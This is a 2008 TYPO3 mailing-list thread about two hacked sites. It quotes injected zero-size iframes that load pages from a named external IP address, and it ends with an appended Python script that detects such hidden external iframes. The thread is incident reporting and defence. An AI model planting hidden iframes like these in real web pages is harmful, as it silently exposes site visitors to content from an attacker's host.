[TYPO3] Typo3 sites HACKED!

Christian Platt christian.platt at pharmaline.de
Thu Mar 20 15:28:28 CET 2008


Hmm,

to take it away is just cleaning the symptoms, but how did it get
there? What hardware/OS is it?
Christian


On 20.03.2008 at 15:06, Theo Kotey wrote:

> Theo Kotey wrote:
>> ries van Twisk wrote:
>>> may be this will give you a clue:
>>>
>>>> <body _dragdropupload="true" onload="T3_onloadWrapper();">
>>>
>>> Do you have a drag/drop upload tool in typo3??
>>>
>>> Ries
>>>
>>> On Mar 20, 2008, at 8:14 AM, Ton Akveld [netcreators] wrote:
>>>
>>>> Hi Theo,
>>>>
>>>> This is probably caused by your server being too 'open' to the
>>>> general 'public'...
>>>> The ip is from Hong Kong...
>>>>
>>>> Good luck,
>>>>
>>>> Ton
>>>>
>>>>
>>>>
>>>> Theo Kotey wrote:
>>>>> Hi List
>>>>>
>>>>> Two of my Typo3-running websites have been hacked. I am trying to
>>>>> figure out how but there is an unknown ip address 58.65.236.89
>>>>> which belongs to HostFresh. Does anybody have any info on these guys?
>>>>>
>>>>> My websites are quite slow and show some error messages like
>>>>>
>>>>> Warning: Cannot modify header information - headers already sent by
>>>>> (output started at
>>>>> /home/micropro/public_html/typo3_src/t3lib/class.t3lib_timetrack.php:595)
>>>>> in
>>>>> /home/micropro/public_html/typo3_src/t3lib/class.t3lib_userauth.php
>>>>> on line 278
>>>>>
>>>>> When I debug the site using Firebug this is what I get below
>>>>>
>>>>> ##########################################################################
>>>>>
>>>>>
>>>>> <html>
>>>>> <head>
>>>>> </head>
>>>>> <body _dragdropupload="true" onload="T3_onloadWrapper();">
>>>>> <iframe width="0" height="0" border="0"
>>>>> src="http://58.65.236.89/in3/index.php">
>>>>> </iframe>
>>>>> <iframe width="0" height="0" border="0"
>>>>> src="http://58.65.236.89/in3/index.php">
>>>>> </iframe>
>>>>> <iframe width="0" height="0" border="0"
>>>>> src="http://58.65.236.89/in3/index.php">
>>>>>
>> None that I know of
> My hosting provider Siteground.com managed to solve my problem
> (Hooorrrayy!!!).
>  Here's what they have to say
>
> #############################################
> Hello,
>
> Thank you for contacting our Support Center. I've checked your account
> and it seems that the hack was actually a remote code inclusion only.
> Which means that no other damage, apart from the iframes, has been
> done.
>
> I've cleaned the code of your application and that should have fixed
> the problem. Could you please check?
>
> If you have any other questions or comments, please don't hesitate to
> contact us!
>
> Best Regards,
> Val M.
> Shift Supervisor
> http://www.SiteGround.com
> #############################################
>
> These guys are the best and they solved my problem in 7 mins.
> _______________________________________________
> TYPO3-english mailing list
> TYPO3-english at lists.netfielders.de
> http://lists.netfielders.de/cgi-bin/mailman/listinfo/typo3-english
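The injected markup quoted in this thread (zero-sized iframes loading from a host other than the site) can be detected in rendered pages or template files. The following is an added example, not part of the original thread: the function names, the site host `www.example.com` and the sample page (using a documentation-range address) are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

ZERO = re.compile(r"^\s*0+(px|%)?\s*$", re.I)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are invisible AND load from another host."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # list of (line number of the tag, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        # Relative URLs have no hostname and are treated as same-site.
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        external = bool(host) and host != self.site_host
        invisible = (ZERO.match(a.get("width", "")) is not None
                     or ZERO.match(a.get("height", "")) is not None
                     or HIDDEN_STYLE.search(a.get("style", "")) is not None)
        if external and invisible:
            self.findings.append((self.getpos()[0], a["src"]))

def find_hidden_iframes(html, site_host):
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample modeled on the markup in the thread; 203.0.113.7 is a
# documentation-range placeholder, not an address from the incident.
SAMPLE = """<html>
<head>
</head>
<body onload="T3_onloadWrapper();">
<iframe width="0" height="0" border="0"
src="http://203.0.113.7/in3/index.php">
</iframe>
<iframe width="600" height="400" src="/fileadmin/map.html"></iframe>
<iframe width="560" height="315" src="http://video.example.org/embed/1"></iframe>
</body>
</html>
"""

if __name__ == "__main__":
    for line, src in find_hidden_iframes(SAMPLE, "www.example.com"):
        print(f"line {line}: hidden external iframe -> {src}")
```

A hit only shows where the symptom is; the web server access logs and file modification times around the first appearance are what answer how the markup got there.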
